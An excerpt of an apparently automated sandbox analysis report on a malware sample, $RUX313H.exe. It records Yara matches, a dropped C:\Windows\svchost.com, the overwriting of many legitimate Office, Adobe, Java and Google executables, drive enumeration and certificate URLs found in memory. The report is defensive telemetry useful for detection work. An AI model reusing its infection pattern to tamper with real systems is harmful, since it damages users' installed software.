                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Infects executable files (exe, dll, sys, html)Show sources
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,0_2_00406D40
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose,0_2_00405080
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose,0_2_00405634
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404F6C FindFirstFileA,FindClose,0_2_00404F6C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0C4
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0CC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,0_2_0040F13F
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,0_2_004056A7
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EA04 FindFirstFileA,FindClose,0_2_0040EA04
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EB16 FindFirstFileA,FindClose,0_2_0040EB16
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,0_2_0040EB18
                          Source: C:\Windows\svchost.comCode function: 2_2_00405634 FindFirstFileA,FindNextFileA,FindClose,2_2_00405634
                          Source: C:\Windows\svchost.comCode function: 2_2_00404F6C FindFirstFileA,FindClose,2_2_00404F6C
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,2_2_0040F0C4
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,2_2_0040F0CC
                          Source: C:\Windows\svchost.comCode function: 2_2_00405080 FindFirstFileA,FindNextFileA,FindClose,2_2_00405080
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,2_2_0040F13F
                          Source: C:\Windows\svchost.comCode function: 2_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,2_2_004056A7
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EA04 FindFirstFileA,FindClose,2_2_0040EA04
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EB16 FindFirstFileA,FindClose,2_2_0040EB16
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,2_2_0040EB18
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/root.crl0
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
